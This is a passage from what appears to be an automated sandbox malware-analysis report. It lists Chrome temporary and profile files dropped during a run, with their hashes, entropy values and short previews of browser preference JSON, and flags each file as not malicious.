                                                                                                                                                                • Number of non-executed functions: 2
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .html
                                                                                                                                                                Warnings:
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, CompPkgSrv.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted):
• Excluded domains from analysis (whitelisted):
                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7296 because it is empty
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

Time | Type | Description
19:12:04 | API Interceptor | 42x Sleep call for process: powershell.exe modified

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\181d9f53-a91d-46dc-849c-6819b7bbc087.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73422
                                                                                                                                                                Entropy (8bit):6.043838614972576
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:IFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:UQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:EF84EDF9419DD7CCD0E97AB956A1DEAB
                                                                                                                                                                SHA1:F0C54AF0788B8A82B8948CE8F7EFE0BC71C5B905
                                                                                                                                                                SHA-256:45076C4B715C9DBA927C61C807B086D3C2FC386C6CF7DE67083754C53CC2BD7B
                                                                                                                                                                SHA-512:67D91CD4303E040E704B68D5C658D1B80B52B68AA3BA03E29BA9252D1BDE19E544873700DA1E41F141E938475102394739EF08AA401ABD5CC6ACEA704F2CA7D9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\19180621-b889-4aba-97b3-7fa2e634d400.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):111472
                                                                                                                                                                Entropy (8bit):3.762200965870132
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:4hnDwMoWkNJRGhYyY4MvX9ip/y6pJe3u0H4E5QASmzTColkGSKwXsuR9AjXc2CyK:6mYGuJGL/Elve2dUwhxKEyVTa
                                                                                                                                                                MD5:E7302C0B7B18E9DA2D02197EDCFB2BD1
                                                                                                                                                                SHA1:A8080458659A5D53222A36F461782A19D7C81A69
                                                                                                                                                                SHA-256:1311E2A03F008B53DE6B2E311F4B39A6AA3FE1C7C0A97D0DE0622E3A0A3A68A6
                                                                                                                                                                SHA-512:471E74DA76D33C77D4A7E735FD4105F9CF61607F37BE4CA179BEC9FDD9692EBBBB3C575BC46A1FA47B8B8BF9D1C94B1B86A4D9AA2D31FD46BAFCD511D1F22891
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3636c5d0-f0f5-477f-8b88-06c396ac3db8.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73441
                                                                                                                                                                Entropy (8bit):6.044228995529113
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:hFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:3QIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:131A341429359EE4E340095A43277B6B
                                                                                                                                                                SHA1:42C03CA6C04F666B9C4AB46883239140F0580468
                                                                                                                                                                SHA-256:CDA95A3F719866C96FF83E7E785A90026B425A81BEA8165334B0A28816AA34DB
                                                                                                                                                                SHA-512:5ECF0A7079EBB401501A98334F0A8F82C2A19F467204F11207C125DE9D78B9661B928C9E1388422B4BED87AFBEB59D02DF56B669D8E409FC772496D2C13A042E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3db5b1a1-42f6-40d1-836e-07916e23b8ce.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77886
                                                                                                                                                                Entropy (8bit):6.077006982775623
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:sFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:wQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:522D65461F6FB16D8FEE67BCAC8FB033
                                                                                                                                                                SHA1:0CEF645870F4BB6490A331EF3EBFF554373EB62E
                                                                                                                                                                SHA-256:5094EAC1E65BD4D9770B6C06FCC64952C9DDA210AE515D7603707029774E29CB
                                                                                                                                                                SHA-512:8963E3BFC14F0F020F877C4A3C9726D5B0E9DF0F794C1B20FE56BF4009E2F3DFE732ADCBC5B749524123D45A1BDF42E5CA60C52F5CBAA70D31373AB9E8E88022
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\74894949-48e8-4c42-b7c2-106ed347464c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):110732
                                                                                                                                                                Entropy (8bit):3.7624853019517377
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OhnDwMoWkNJRGhYyY4MvX9ip/y6pJe3u0H4E5QASmzTColkGSKwXsuR9AjXc2CWT:0mYGuEGL/Elve2dUwhxKEyVTK
                                                                                                                                                                MD5:7171A19C7D99F78A95AC278D2403AD29
                                                                                                                                                                SHA1:35EB15DEA17948C329567382A136B3D6BC78453E
                                                                                                                                                                SHA-256:15050949C383DF14BFDA93135CA3CA1CE0B1CA96F113DF5F85F613B8105F49CE
                                                                                                                                                                SHA-512:2727DA95ADA8E29E6EACB571D7A444F84C94F9767632D2ECDB43786A4C4E3C1C22A167F6D0F8702F792D143B366B43F903D0B20280D2D274E990128C0E04763E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\90c64af1-dba9-41ff-9e26-e2fa720d06fa.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73441
                                                                                                                                                                Entropy (8bit):6.044226426231925
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:5Fpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:PQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:C09599A339E7331EC0BFC4456A00E962
                                                                                                                                                                SHA1:F90D36D1388D36BBD55394B17E53C3DBEA37BAA8
                                                                                                                                                                SHA-256:6753414437640696F13D891ABE123C06C676A341B1B5E37643B1D5E1BBF985BA
                                                                                                                                                                SHA-512:97AB8FCFE365D9726A4B3047D54060C5B41273BE3897081156CC0B4D38AC0C3B68AB81FDA7284A3A9DA49F6F42927A9D14BED27F5C05F040D21E71A8E99DDDB2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\9f4242d4-fee4-4107-b2c8-e569c79fe597.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):103220
                                                                                                                                                                Entropy (8bit):3.7617699118143513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:whnDwMoWkNJRVYnvX9ip/y6pJe3u0hE5QASmNColkGSfHR9AjV2CWKwFyxXPvklY:QYG8EGL/Elve2ahxKeyVTm
                                                                                                                                                                MD5:EEEC6F847466324F8C09F44A6EAFF319
                                                                                                                                                                SHA1:643D2BBA0448068785F58988968D5C4F5C9B76CD
                                                                                                                                                                SHA-256:2A1D20317DDA0D20C7FDA014AAE308F409EDC8E0CFF1DC6B2DE1DFB209EB4AB7
                                                                                                                                                                SHA-512:324CA95F02454A3692F6EA3454822B97CE260C0B56C6E9A1077DAA8DF7ACD90EFC3BEBB42E5DEF5350BD19F62B4421792CB77D3E4B65DF9A2C49ECEB45014852
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):3.254162526001658
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:FkXSoWA0:+g
                                                                                                                                                                MD5:FA7200D6F80CD1757911C45559E59C0E
                                                                                                                                                                SHA1:89C6E99BAEC4EBB3E9A97B928FB473D1498EBA88
                                                                                                                                                                SHA-256:D9779EA4D6DD544A23C2A1C53146B6A4E596927F47DFA0680B0A7EE751D43BB2
                                                                                                                                                                SHA-512:71D9B2DA8EAF404063D918812BA61C3EFB6A23A283B0332180A38C8137FBB21D7977C008D5A57A74469776945CD4ED42C0BCC09F923EDEC52D8F7FE90FA2D104
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: sdPC.....................A.>'..M..,.,.-.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1ed19a1e-8aa6-491c-b098-b8a59a0c270d.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):21102
                                                                                                                                                                Entropy (8bit):5.533022210199644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarULdHGGnHfn/m4i:GLljQ1kXqKf/pUZNCgVLH2HftrULBGGU
                                                                                                                                                                MD5:CD448B36767EC023BF56DCE73376DD16
                                                                                                                                                                SHA1:0950071C9DE6436367092331F145B2BB707877D0
                                                                                                                                                                SHA-256:3CEE50ACE3665FA5BECCE1C891574F7F4E71F95B15A12251CB308F6ACE1D9A85
                                                                                                                                                                SHA-512:CAE08E011274ED298F377BB8CA117158EF2422EA646C471551C0587404A67AFC756C4385A10C64A8C6A99B47C1A6CFEA624E47EAA2089B81F28AE19A0E60049D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2c514167-5195-4c1a-9430-f387fa86afff.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.003468715706129
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKIN1aRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:6D57FD7E267111896845AC671FEE4BF9
                                                                                                                                                                SHA1:D068BE0C659E9E6D99A6D72E64F1CDA7FD0DD933
                                                                                                                                                                SHA-256:E8D3C8084404E89F437F276D64104A5ED6D3E7E806FACE55CF9137A07BEF7E1B
                                                                                                                                                                SHA-512:93389C0411CBDD1A4839E41DEC29DA9CDFDF103E1DAFACED12B3DA7B1914A47F7145DDBA29997144B1AD14F7D912CA7074827019CB4EC18A1AC0049FF68900B6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2e76c646-8c90-4fc4-b51b-b070e44dcfda.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950763973648408
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuAip:n50nNmaRWMoiVmdeVtMVuAip
                                                                                                                                                                MD5:9C92AB8E1E9E924BD362FFBAD4C4B312
                                                                                                                                                                SHA1:F860816E33FA0B1ADCFBFADCED9D493721C41FC8
                                                                                                                                                                SHA-256:5C79045F01894515A73F7842ADC44028C12F5956D85F00375E99BDDB9103394E
                                                                                                                                                                SHA-512:2BFBA06032032232BFA80F316489E917A3F77CF95FD16755CF7B08D586F03026EA78F83B23C49EC024E50581BB5604F1AF474F21F57637AA0C08347F97AF0042
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2f1d5792-f723-483e-999e-d1d70833604b.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):708
                                                                                                                                                                Entropy (8bit):5.564956104815177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YI9Mkq/HH+UAnIOVRWcNnYj+UAnIblTZCPXR7N+UAnI7PHt0FKO+UAnInQ:YIakq/HeU4nWaUxSh7wUhtVRUJQ
                                                                                                                                                                MD5:59E7A95B3EE22ADFEF4A42969734CE7B
                                                                                                                                                                SHA1:06A91D42BC129BD3E4273E7FCF43563FC15A1C3A
                                                                                                                                                                SHA-256:3A8F1C81B97F32A06FBD7B3A2200B2FC1DE77EA39CAC6E1AC3FBAF48045822E9
                                                                                                                                                                SHA-512:3BC57E33A4F26FCE59BDBEEE4E12704767AF6EC5366416B947D8CC42F627D708FA194DCB2BD9D2A2E2CDF72E35E29F9677E62ADDBD825985C0BEB280DD61E9CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\41699dff-8814-425c-a6ea-2da77db4549c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4794
                                                                                                                                                                Entropy (8bit):5.24749425498766
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:nvAdIllnHa8KIN1aRWMoiVmdexVrMVXAiZw4:nodWHa8MWMBVq
                                                                                                                                                                MD5:E20011D796B928DF928BD3C7188DCB63
                                                                                                                                                                SHA1:39056EACA6FAF710C7D003EFF9194DCA6FAC1CE9
                                                                                                                                                                SHA-256:F676A94A4FB5231B8FE53D570DE9BB09F6F1C49E96EC271F731B085E3F74E95B
                                                                                                                                                                SHA-512:E8A124AE0243B1969A976D14B90D33F87B83A18111A3E8655435D57AC9AB18D1EF97483AE950258C8E8FC64ED39D804F5A3CC2DA659BF13D26462E926AEF52D8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4469433b-5b42-45c3-bdb2-5ead1408960e.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3343
                                                                                                                                                                Entropy (8bit):4.945222848960228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YXsVVMHzzsmdAMHtKsyfDszmcQ/RLsOcXSsM1PzshVMH8sp1AAMHDysKGMHTFsB5:PGqGctrmKwGPTGD7GSGMphH
                                                                                                                                                                MD5:CAB8BEABE7E66A4015C98A3C77B3698B
                                                                                                                                                                SHA1:C960AAAEA7014E105290C7D0F09BFCA837C8E8CC
                                                                                                                                                                SHA-256:75431010BFE77818B8BEF4B0C4B328C00668DC6B13C09AAB769EBF58BDA4EDF7
                                                                                                                                                                SHA-512:0D1E94E84294AEA4BF400FF9D0654748BFFEB92D3A1643A6A13B541ADB1BC13EA2F649560A27C8CC3D8AEF9DA5D6B668C7E3BE696091CE882A475B91A9A4CAC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230891381309","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230891381310","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39697},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230887958662","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230887958664","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":52163},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230886326794","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230886326795","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5b5c9702-994a-420f-a2dc-e3664907a7df.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15868
                                                                                                                                                                Entropy (8bit):5.5774051809815495
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarUQntm41:GLljQ1kXqKf/pUZNCgVLH2HftrUuma
                                                                                                                                                                MD5:8C7279D30F5DAB19786F5ED17AC4ED52
                                                                                                                                                                SHA1:BF90C07B18CA341FA16350863F6A60F5E953BBEE
                                                                                                                                                                SHA-256:616BD067902D64231003147629857659F6DC9B45242C48416411EB9AFE3C7EDB
                                                                                                                                                                SHA-512:03F9EFD638C63A6057A3460AF8E0301D17A1868973AE8C39EC3E13AE49899C1275A322484778239B3282470752F1AA5A502EEFBFBAB02541E8DD15CB775D8A2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5f553002-c2c9-4f2c-b30a-1bd497a54999.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15867
                                                                                                                                                                Entropy (8bit):5.5776230054412395
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:Oizt7Ll7XQ1kXqKf/pUZNCgVLH2HfEarUmntm4xN:hLljQ1kXqKf/pUZNCgVLH2HftrUYmQ
                                                                                                                                                                MD5:E434275EF952AB8A5EC2556162E19245
                                                                                                                                                                SHA1:83714B340A27533B80ADF2D9CA8B650C3CE3686C
                                                                                                                                                                SHA-256:735D2AF58FE5713F4B99620311EA47F17576BD748696D3F748F4EE527AF9378B
                                                                                                                                                                SHA-512:7FF1A650C7816CEC90E77B89DF3F9E4D20A7FB748A84F49E64518B70644D6984B8A166270343719BE402177F2D5A0F9B94B693B6AAEECDD6C04F05521ADA1A29
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\723aa1b0-616b-4450-9cb0-19f961bda179.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\7780ba6a-e8df-41c8-b60c-41967110ae39.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4198
                                                                                                                                                                Entropy (8bit):5.014393042635659
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlVvErAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGqrVrqH:nzAdKIN1aRWMoiVmdexVrMVXAiZw4
                                                                                                                                                                MD5:C8BA2271CEAEEC958D05A61C0FA6A46B
                                                                                                                                                                SHA1:408388C34517EBF2D5CE3CDEB054C23371FF5B07
                                                                                                                                                                SHA-256:73DE4038741F2EBE8491226278D905927D497ED6AAF652EBDD7BF0DF1995EC2B
                                                                                                                                                                SHA-512:B9F9D278CCBFC20B4C25EBA5526E44DB3F5489E6D12995FC1F8EF497F51426B9C283F3C4E8F1622EB66C03D73E2B89D4789F66416BC25F9F5D13923645E3EC9D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"49601082":1,"5151071":1,"54845618":5}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gc
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9e077c77-197d-4e12-abca-1cbe35258060.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.003468715706129
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKIN1aRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:6D57FD7E267111896845AC671FEE4BF9
                                                                                                                                                                SHA1:D068BE0C659E9E6D99A6D72E64F1CDA7FD0DD933
                                                                                                                                                                SHA-256:E8D3C8084404E89F437F276D64104A5ED6D3E7E806FACE55CF9137A07BEF7E1B
                                                                                                                                                                SHA-512:93389C0411CBDD1A4839E41DEC29DA9CDFDF103E1DAFACED12B3DA7B1914A47F7145DDBA29997144B1AD14F7D912CA7074827019CB4EC18A1AC0049FF68900B6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.814394910915397
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLyFErbXaFpEO5bNmISHnCWm06UwcQ5n5fBfQZllr1bZQmsX3qqDy:TeFErLOpEO5J/Knvm7U1QpB4ZPXQ3q1
                                                                                                                                                                MD5:58A2CB8A1372A56A58FFA2BEF382A06B
                                                                                                                                                                SHA1:D455995F8373F20DD6980358C348D11D3A25946D
                                                                                                                                                                SHA-256:54A77DDC035D6550719BEE8FFF6AA00DA2F7ACDB10B3F0DCB0B84A46C58B869A
